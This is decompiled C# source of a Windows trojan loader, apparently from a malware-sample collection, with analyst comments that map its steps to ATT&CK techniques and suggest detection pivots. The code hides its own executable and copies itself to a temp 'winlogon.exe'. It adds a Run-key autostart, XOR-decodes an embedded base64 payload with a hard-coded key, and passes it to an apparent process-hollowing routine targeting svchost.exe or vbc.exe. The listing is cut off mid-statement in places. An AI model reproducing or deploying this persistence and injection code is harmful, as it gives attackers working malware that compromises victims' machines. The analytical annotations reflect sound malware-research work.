MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.aagm-a1de981948b7415a4407eaa794cf1d79cc909c19ce8bb77b92ae1d70972c7684/BizlpPEBuNKhDbh.cs

// Decompiled with JetBrains decompiler
// Type: BizlpPEBuNKhDbh
// Assembly: Humanities Brochure, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 52299A9A-4AA4-4108-B5D3-F7828126CA81
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.aagm-a1de981948b7415a4407eaa794cf1d79cc909c19ce8bb77b92ae1d70972c7684.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.IO;
using System.Text;
using System.Windows.Forms;
[StandardModule]
internal sealed class BizlpPEBuNKhDbh
{
[STAThread]
public static void Main()
{
nEHKCapiSBDXzFS nEhkCapiSbdXzFs = new nEHKCapiSBDXzFS();
string s = "0d4inYeLmKmGgb6gfVG6nDyynYSLmKmCwb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66JISynYqUIqeCNbdtoxa70EmTyezi64ny89HH8M/XvOfT8+rk7Ing5J7S98Ca9eqS2cvYuMTt5duOj6OwuISynYSLmKk1k7l7cd3TFHfB9Ax468AKm9LEClzJ9Qzg9Ofja9rrCb6ggq66nISynYSLmKmCgb6ggq66nISyndTOmKnOgL2gpbIN0YSynYSLmKmCYb6vg6W7moSy7YKLmLmCgb6ggq42j4SynZSLmKkCh76ggu66nJSynYSbmKmGgb6gg666nICynYSLmKmCgb6ngq6qnISjA4KLmqmCgb6gkq66jISynYSbmKmSgb6ggq66jISynYSLmKmCgb6gJt28nKyynYSLaK+CubCggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISan4SLuKmCgb6wgq7WnYSynYSLmKmCgb6ggq66nISynYSLmKmCgb6grNrf5PCynYTv/q+Cga6ggq7KmoSyjYSLmKmCgb6ggq66nISyvYSL+Ifm4MrBgq66COaynYQLnqmCgb6ggq66nISynYSLmKmCgb6ggu66nESc7/f5+6mCgYaugq66bIKynZSLmKkCh76ggq66nISynYSLmKnCgb7g7nTh1pSynYSLmKmCgb6gguPpysbk0LK7tu3Ozb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSL
mKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSL
mKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq66nISynYSLmKmCgb6ggq6
// --- Concealment, persistence and payload decoding (statement run inside Main) ---
// Both comparisons below test the constant "T" against "T", so both branches always
// execute. NOTE(review): these look like builder-set option flags baked in at build
// time; that is an inference from the constant operands, not something the file states.
string Left = "T";
if (Operators.CompareString("T", "T", false) == 0)
// Marks the running executable as Hidden (ATT&CK T1564.001, Hidden Files and Directories).
File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden);
if (Operators.CompareString(Left, "T", false) == 0)
{
try
{
// Copies the running executable to <temp path>winlogon.exe. The name matches the Windows
// logon process, whose genuine image lives under System32, so a winlogon.exe image in a
// temp directory is a strong masquerading indicator (T1036.005).
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, Path.GetTempPath() + "winlogon.exe");
// Per-user logon autostart (T1547.001): writes the value "winlogon.exe" under
// HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the quoted temp-path copy as data.
// Hunting pivot: Run values whose data points into a temp directory.
// OpenSubKey can return null; the resulting exception is swallowed by the catch below.
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("winlogon.exe", (object) ("\"" + Path.GetTempPath() + "winlogon.exe\""), RegistryValueKind.String);
}
catch (Exception ex)
{
// SetProjectError/ClearProjectError is what a VB-compiled empty Catch decompiles to:
// every failure is silently discarded. Because the copy and the registry write share
// this try, a failed copy also skips the Run-key write.
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
// Base64-decodes the embedded string `s` (declared earlier in Main) and passes the bytes
// through mJhZVhxNiWfDxbd with the hard-coded key "TLzULCPaJIvhJfr". The result is the
// buffer handed to PxLkkMUhJcIgxYx further down in Main.
byte[] yopsrcqtdqlvwypcca = BizlpPEBuNKhDbh.mJhZVhxNiWfDxbd(Convert.FromBase64String(s), "TLzULCPaJIvhJfr");
// Seeds the VB runtime random generator; no use of the generator is visible in this listing.
VBMath.Randomize();
Encoding.GetEncoding(1252).GetBytes("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
// --- Host selection and hand-off of the decoded buffer (statement run inside Main) ---
// os.KEVFbLWcYjBPXYi() returns true when the ProgramW6432 environment variable is
// non-empty, so the switch picks a different host path depending on that check.
// Both arms pass the decoded buffer plus a path to a signed Windows binary into
// nEHKCapiSBDXzFS.PxLkkMUhJcIgxYx, whose body is not part of this file.
// NOTE(review): a (payload bytes, host executable path) pair is the usual shape of a
// process-hollowing / RunPE loader (T1055.012); confirm against nEHKCapiSBDXzFS.
// Detection angle: svchost.exe or vbc.exe started by a parent running from a temp
// directory, and svchost.exe whose parent is not services.exe.
switch (BizlpPEBuNKhDbh.os.KEVFbLWcYjBPXYi())
{
case false:
try
{
// ProgramW6432 empty: host path is <system drive>:\Windows\system32\svchost.exe.
// Environment.SystemDirectory[0] supplies the drive letter.
nEhkCapiSbdXzFs.PxLkkMUhJcIgxYx(yopsrcqtdqlvwypcca, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\system32\\svchost.exe");
}
catch (Exception ex)
{
// Decompiled form of an empty VB Catch: the failure is discarded without logging.
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
// Terminates this process whether or not the hand-off succeeded.
ProjectData.EndApp();
break;
case true:
try
{
// ProgramW6432 set: host path is the .NET Framework v2.0.50727 Visual Basic compiler, vbc.exe.
// NOTE(review): the Framework (not Framework64) directory suggests a 32-bit host is
// chosen deliberately on 64-bit systems; confirm.
nEhkCapiSbdXzFs.PxLkkMUhJcIgxYx(yopsrcqtdqlvwypcca, Conversions.ToString(Environment.SystemDirectory[0]) + ":\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe");
}
catch (Exception ex)
{
// Same silent discard as in the other arm.
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
// Terminates this process whether or not the hand-off succeeded.
ProjectData.EndApp();
break;
}
}
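/// <summary>
/// Decodes a buffer that was obfuscated with a repeating-key XOR plus a one-byte seed.
/// The last byte of <paramref name="message"/> is not data: XORed with 112 it yields the
/// seed that is mixed into every output byte. It is dropped from the result.
/// </summary>
/// <remarks>
/// Analyst note: the decompiler emitted the key index as an uninitialised local declared
/// inside the loop, which does not compile as C#. In the VB original such a local is
/// zero-initialised and keeps its value across iterations. That is restored here so the
/// routine can be used to recover the embedded payload for static analysis.
/// </remarks>
/// <param name="message">Obfuscated bytes followed by one trailing seed byte.</param>
/// <param name="password">Key string; its bytes are taken with <see cref="Encoding.Default"/>.</param>
/// <returns>A new array of <c>message.Length - 1</c> decoded bytes.</returns>
/// <exception cref="IndexOutOfRangeException">
/// Thrown when <paramref name="message"/> or <paramref name="password"/> is empty.
/// </exception>
public static byte[] mJhZVhxNiWfDxbd(byte[] message, string password)
{
    byte[] keyBytes = Encoding.Default.GetBytes(password);
    int lastIndex = checked(message.Length - 1);

    // Seed byte travels at the end of the buffer, masked with the constant 112 (0x70).
    int seed = (int) message[lastIndex] ^ 112;

    byte[] scratch = new byte[checked(message.Length + 1)];

    // Function-scoped and zero-initialised, as in the VB original.
    int keyIndex = 0;
    for (int i = 0; i <= lastIndex; i = checked(i + 1))
    {
        scratch[i] = checked((byte) ((int) message[i] ^ seed ^ (int) keyBytes[keyIndex]));

        // The wrap point is password.Length, not keyBytes.Length, exactly as in the sample.
        // The two differ only if the key contains characters that encode to several bytes.
        keyIndex = keyIndex == checked(password.Length - 1) ? 0 : checked(keyIndex + 1);
    }

    // Drop the trailing seed position: the result is one byte shorter than the input.
    byte[] decoded = new byte[checked(message.Length - 2 + 1)];
    Array.Copy(scratch, decoded, decoded.Length);
    return decoded;
}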
/// <summary>
/// Environment probe used by Main to choose which host executable path is passed to the loader.
/// </summary>
public class os
{
    /// <summary>
    /// Reports whether the ProgramW6432 environment variable holds a non-empty value.
    /// Windows defines that variable on 64-bit installations, so this serves as a 64-bit OS check.
    /// </summary>
    /// <returns><c>true</c> when ProgramW6432 is set to a non-empty string; otherwise <c>false</c>.</returns>
    public static bool KEVFbLWcYjBPXYi()
    {
        string programW6432 = Environment.GetEnvironmentVariable("ProgramW6432");

        // VB string comparison treats a missing (null) variable the same as "".
        int comparison = Operators.CompareString(programW6432, "", false);
        return comparison != 0;
    }
}
}